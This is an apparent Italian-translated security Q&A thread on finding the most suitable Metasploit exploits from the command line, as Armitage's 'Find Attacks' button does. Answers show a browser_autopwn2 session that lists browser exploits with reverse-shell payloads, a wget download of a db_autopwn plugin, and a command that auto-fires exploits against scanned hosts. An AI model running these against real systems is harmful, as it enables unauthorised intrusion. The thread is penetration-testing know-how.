armitage trovare strumento di attacco cli comando equivalente

3

Ho usato metasploit attraverso il cli e un po 'attraverso l'armitage. Lo strumento in armitage per trovare gli attacchi che ti danno gli attacchi che hanno maggiori probabilità di funzionare è abbastanza utile, quindi mi chiedevo quale sia il comando cli da eseguire se ce n'è uno.

Se non esiste qual è il modo migliore per filtrare i moduli e scoprire quali sono i migliori attacchi possibili. Ovviamente utilizzo la ricerca e il filtro in base al servizio, al sistema operativo, ecc. Ma non ho modo di sapere quale modulo sarebbe il più adatto rispetto ad altri.

    
posta dmnte 11.04.2016 - 16:18
fonte

3 risposte

2

In Metasploit esisteva un'opzione di autopwn che faceva ciò che cercavi, ma solo i browser di destinazione. Tuttavia, proprio come suggerisce il nome in Armitage, seleziona una vasta serie di exploit, spara al bersaglio e spera per il meglio. Tuttavia, lo sfruttamento se non eseguito correttamente può causare più danni che benefici. Ad esempio, un exploit SMB con una destinazione errata selezionata può causare l'arresto anomalo del servizio SMB che richiede il riavvio manuale della macchina per poter essere risolto. Significa che non solo la persona che attacca la macchina non otterrà una sessione, ma può anche essere facilmente rilevata. In base a questi dubbi, la funzionalità di avvio automatico è stata dichiarata obsoleta. Metasploit ora ha il modulo AutoPwn2 che si rivolge solo agli exploit basati su browser, ma in un modo molto più intelligente. Questo è migliore nel senso che gli exploit vengono licenziati solo se l'obiettivo viene impresso correttamente e quindi i moduli vengono sparati in base ai loro ranghi, il che significa che vengono tentati prima gli exploit più affidabili. In questo modo se stai prendendo di mira un exploit flash, non devi preoccuparti dell'architettura e dei dettagli del sistema operativo degli utenti connessi e il modulo si prenderà cura di esso.

msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > show options

Module options (auxiliary/server/browser_autopwn2):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
   INCLUDE_PATTERN                   no        Pattern search to include specific modules
   Retries          true             no        Allow the browser to retry the module
   SRVHOST          0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf auxiliary(browser_autopwn2) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn2) > run
[*] Auxiliary module execution completed

[*] Searching BES exploits, please wait...
msf auxiliary(browser_autopwn2) > [*] Starting exploit modules...
[*] Starting listeners...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Using URL: http://0.0.0.0:8080/

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank       Name                                       Payload
 -----  ----       ----                                       -------
 1      Excellent  firefox_webidl_injection                   firefox/shell_reverse_tcp on 4442
 2      Excellent  firefox_tostring_console_injection         firefox/shell_reverse_tcp on 4442
 3      Excellent  firefox_svg_plugin                         firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_proto_crmfrequest                  firefox/shell_reverse_tcp on 4442
 5      Excellent  webview_addjavascriptinterface             android/meterpreter/reverse_tcp on 4443
 6      Excellent  samsung_knox_smdm_url                      android/meterpreter/reverse_tcp on 4443
 7      Great      adobe_flash_worker_byte_array_uaf          windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_domain_memory_uaf              windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_copy_pixels_to_byte_array      windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_casi32_int_overflow            windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_uncompress_zlib_uaf            windows/meterpreter/reverse_tcp on 4444
 12     Great      adobe_flash_shader_job_overflow            windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_shader_drawing_fill            windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_pixel_bender_bof               windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_opaque_background_uaf          windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_net_connection_confusion       windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_nellymoser_bof                 windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_hacking_team_uaf               windows/meterpreter/reverse_tcp on 4444
 19     Good       wellintech_kingscada_kxclientdownload      windows/meterpreter/reverse_tcp on 4444
 20     Good       ms14_064_ole_code_execution                windows/meterpreter/reverse_tcp on 4444
 21     Good       adobe_flash_uncompress_zlib_uninitialized  windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://x.x.x.x:8080/
[*] Server started.
    
risposta data 14.04.2016 - 07:36
fonte
2

Dopo aver esaminato il codice Armitage per Find Attacks , sembra che abbia implementato la propria versione di una vecchia opzione in Metasploit db_autopwn che era stata ritirata nel 2011.

Tuttavia, ho trovato un plugin aggiornato "di recente" (agosto 2017) per questa opzione che può essere trovata qui: metasploit-db_autopwn

Per installare, vai alla directory dei plugin Metasploits (in Kali: /usr/share/metasploit-framework/plugins/ )

Quindi scarica il plug-in:

wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb

Avvia Metasploit e quindi carica il plugin:

msf > load db_autopwn

Puoi controllare le opzioni con db_autopwn -h

Scansiona e carica gli host nel tuo database come di solito utilizzeresti db_nmap .

Se desideri scansionare & esegui exploit che hanno il grado di "grandi" sessioni di apertura automatica, puoi eseguire:

msf > db_autopwn -p -R great -e -q

    
risposta data 06.12.2017 - 08:13
fonte
0

Msfconsole ha un comando di ricerca. Se provi prima con search -h avremo la sintassi valida, con il modulo di ricerca avrai opzioni da trovare per cve, titolo, nome piattaforma ecc. Se devi filtrare, usa il tasto tab allo stesso modo in cui usi in console linux. Visualizzerà le opzioni di completamento automatico.

Questa strada è molto più manuale rispetto alla funzione di ricerca dell'armitage, ma se passi il tempo a trovare quegli attacchi da solo, ti darà reali abilità, oltre a premere il pulsante Trova gli attacchi in armitage. Ecco il tutorial db metaspoit , in questa guida troverai come avviare manualmente il db , come importare scansioni da altri strumenti, ecc.

Di fatto, la fase di sfruttamento dipenderà direttamente dalla fase di raccolta delle informazioni, quindi non limitare la gioia dello sfruttamento allo strumento automatico per fare il lavoro per te. Sono un sacco di exploit che non sono inclusi in metasploit / armitage e dovrai trovarlo "là fuori", è sempre una buona idea cercare in luoghi famosi come exploit database leggi sempre un exploit e capisci cosa fa, e in che modo, prima di usarlo, puoi farti del male o di altri

Con tutto ciò che è stato detto, buona caccia.

link

    
risposta data 13.04.2016 - 14:41
fonte

Leggi altre domande sui tag